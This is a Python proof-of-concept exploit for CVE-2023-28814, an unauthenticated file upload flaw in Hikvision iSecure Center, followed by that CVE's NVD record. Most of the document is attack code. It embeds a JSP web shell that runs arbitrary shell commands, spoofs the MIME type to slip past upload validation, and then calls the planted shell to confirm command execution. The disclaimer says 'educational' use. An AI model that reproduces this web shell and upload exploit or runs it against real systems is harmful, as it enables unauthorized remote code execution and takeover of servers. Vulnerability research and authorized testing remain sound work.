CVE-2023-28814

# CVE-2023-28814 - Hikvision iSecure Center File Upload Exploit # WARNING: This PoC is for educational and authorized testing purposes only import requests import sys TARGET_URL = "https://target-host:port" UPLOAD_PATH = "/center/api/files/upload" # Example upload endpoint def exploit(target_url, shell_content): """ Exploit improper file upload vulnerability in Hikvision iSecure Center. The vulnerability allows uploading arbitrary files due to insufficient file type validation. """ session = requests.Session() # Step 1: Attempt to access the upload endpoint without authentication # The vulnerability requires no authentication (PR:N) headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36", "Accept": "*/*", "Connection": "keep-alive" } # Step 2: Prepare malicious JSP web shell payload # JSP webshell to gain remote code execution on the server jsp_shell = b"""<%@ page import="java.util.*,java.io.*"%> <% String cmd = request.getParameter("cmd"); if (cmd != null) { Process p = Runtime.getRuntime().exec(new String[]{"/bin/sh", "-c", cmd}); BufferedReader br = new BufferedReader(new InputStreamReader(p.getInputStream())); String line; while ((line = br.readLine()) != null) { out.println(line); } } %>""" # Step 3: Construct the multipart file upload request # Bypass file type validation by manipulating filename and content-type files = { "file": ( "shell.jsp", # Filename with JSP extension jsp_shell, # Malicious JSP content "image/jpeg", # Spoofed MIME type to bypass validation {"Content-Disposition": "form-data; name=\"file\"; filename=\"shell.jsp\""} ) } data = { "type": "image", "folder": "/upload/" } # Step 4: Send the upload request upload_url = target_url.rstrip("/") + UPLOAD_PATH print(f"[*] Attempting to upload webshell to: {upload_url}") try: response = session.post( upload_url, files=files, data=data, headers=headers, verify=False, timeout=30 ) print(f"[*] Response Status: {response.status_code}") print(f"[*] Response Body: {response.text[:500]}") if response.status_code == 200: print("[+] Upload may have succeeded!") # Step 5: Try to access the uploaded webshell shell_url = target_url.rstrip("/") + "/upload/shell.jsp?cmd=id" print(f"[*] Attempting to access webshell at: {shell_url}") shell_response = session.get(shell_url, verify=False, timeout=10) print(f"[*] Shell Response: {shell_response.text[:500]}") return True except Exception as e: print(f"[-] Error: {e}") return False if __name__ == "__main__": if len(sys.argv) < 2: print(f"Usage: {sys.argv[0]} <target_url>") print(f"Example: {sys.argv[0]} https://192.168.1.100:8443") sys.exit(1) target = sys.argv[1] exploit(target, None)

{"cve": {"id": "CVE-2023-28814", "sourceIdentifier": "[email protected]", "published": "2025-10-17T11:15:33.647", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Some versions of Hikvision's iSecure Center Product have an improper file upload control vulnerability. Due to the improper verification of file to be uploaded, attackers may upload malicious files to the server. iSecure Center is software released for China's domestic market only, with no overseas release."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "references": [{"url": "https://www.hikvision.com/cn/support/CybersecurityCenter/SecurityNotices/2023-03/", "source": "[email protected]"}]}}